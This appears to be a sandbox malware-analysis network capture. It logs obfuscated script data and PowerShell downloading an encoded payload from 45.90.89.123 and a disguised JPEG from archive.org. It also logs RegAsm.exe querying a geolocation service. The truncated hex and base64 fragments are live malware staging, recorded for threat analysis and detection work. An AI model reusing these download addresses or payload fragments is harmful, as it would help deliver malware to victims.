Data Ascii: cNbGGjcrL = "GaivbRdczcWNC"vkeTndqNfGLiA = "LcqLSKxglBQqk"UKxUKaWLNcWTk = "WcinKzNoJzgWA"KRlcdtOLemOPf = "KBcecdi
Sep 11, 2024 20:22:16.372288942 CEST  1236  IN  Data Raw: 00 49 00 55 00 69 00 4e 00 57 00 74 00 41 00 70 00 22 00 0d 00 0a 00 4f 00 4b 00 47 00 78 00 6e 00 66 00 69 00 4e 00 74 00 62 00 6e 00 74 00 4c 00 20 00 3d 00 20 00 22 00 78 00 5a 00 57 00 65 00 7a 00 75 00 65 00 6b 00 6d 00 57 00 6a 00 6b 00 4c
Data Ascii: IUiNWtAp"OKGxnfiNtbntL = "xZWezuekmWjkL"KAAbLJfWLZZKB = "GjKLeIUpGmKlL"clGGOPKbbAaCn = "mBLWfctcWcTGj"AoOUiiiti
Sep 11, 2024 20:22:16.377110958 CEST  1236  IN  Data Raw: 00 7a 00 41 00 4b 00 6c 00 6c 00 41 00 20 00 3d 00 20 00 22 00 6d 00 55 00 57 00 6b 00 62 00 4c 00 47 00 4e 00 75 00 4c 00 62 00 6d 00 64 00 22 00 0d 00 0a 00 57 00 50 00 57 00 4f 00 4f 00 4e 00 69 00 69 00 47 00 4c 00 57 00 76 00 49 00 20 00 3d
Data Ascii: zAKllA = "mUWkbLGNuLbmd"WPWOONiiGLWvI = "qtLKWriAjCmiT"UlPPBkiJqLWkb = "bzCcbKpCbfxAK"LdeaBpcfcuUcA = "PlGjJzZzUKWJ


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.22  49163  45.90.89.123  80  3644  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 20:22:23.731884003 CEST  75  OUT  GET /421/UNOST.txt HTTP/1.1
Host: 45.90.89.123
Connection: Keep-Alive
Sep 11, 2024 20:22:24.469748974 CEST  1236  IN  HTTP/1.1 200 OK
Date: Wed, 11 Sep 2024 18:22:24 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 10 Sep 2024 10:49:55 GMT
ETag: "a1000-621c1a24a50c7"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
Sep 11, 2024 20:22:24.469768047 CEST  1236  IN  Data Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
Sep 11, 2024 20:22:24.469779968 CEST  1236  IN  Data Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
Sep 11, 2024 20:22:24.469784021 CEST  1236  IN  Data Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
Sep 11, 2024 20:22:24.469845057 CEST  1236  IN  Data Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
Sep 11, 2024 20:22:24.469857931 CEST  1236  IN  Data Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
Sep 11, 2024 20:22:24.469868898 CEST  1236  IN  Data Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
Sep 11, 2024 20:22:24.469875097 CEST  1236  IN  Data Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
Sep 11, 2024 20:22:24.469950914 CEST  1236  IN  Data Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
Sep 11, 2024 20:22:24.469964027 CEST  1236  IN  Data Raw: 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45
Data Ascii: UKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKP
Sep 11, 2024 20:22:24.475203037 CEST  1236  IN  Data Raw: 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61 4f 5a 6d 7a 62 35 55 57 4f 65 6c 7a
Data Ascii: szA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyNLYzu24qNgaTj


                                                Session ID: 2
                                                Source IP: 192.168.2.22
                                                Source Port: 49165
                                                Destination IP: 178.237.33.50
                                                Destination Port: 80
                                                PID: 3752
                                                Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 11, 2024 20:22:30.763412952 CEST | 71 bytes | OUT | GET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Sep 11, 2024 20:22:31.382930040 CEST | 1170 bytes | IN | HTTP/1.1 200 OK
                                                date: Wed, 11 Sep 2024 18:22:31 GMT
                                                server: Apache
                                                content-length: 962
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Session ID: 0
                                                Source IP: 192.168.2.22
                                                Source Port: 49162
                                                Destination IP: 207.241.227.96
                                                Destination Port: 443
                                                PID: 3644
                                                Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-11 18:22:21 UTC | 113 bytes | OUT | GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                                Host: ia601706.us.archive.org
                                                Connection: Keep-Alive
                                                2024-09-11 18:22:21 UTC | 582 bytes | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.25.1
                                                Date: Wed, 11 Sep 2024 18:22:21 GMT
                                                Content-Type: image/jpeg
                                                Content-Length: 1931225
                                                Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                                Connection: close
                                                ETag: "66d918ff-1d77d9"
                                                Strict-Transport-Security: max-age=15724800
                                                Expires: Thu, 12 Sep 2024 00:22:21 GMT
                                                Cache-Control: max-age=21600
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                Access-Control-Allow-Credentials: true
                                                Accept-Ranges: bytes
                                                2024-09-11 18:22:21 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                2024-09-11 18:22:22 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                                Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                                2024-09-11 18:22:22 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                                Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                                2024-09-11 18:22:22 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                                Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                                2024-09-11 18:22:22 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                                Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                                2024-09-11 18:22:22 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                                Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                                2024-09-11 18:22:22 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                                Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                                2024-09-11 18:22:22 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                                Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
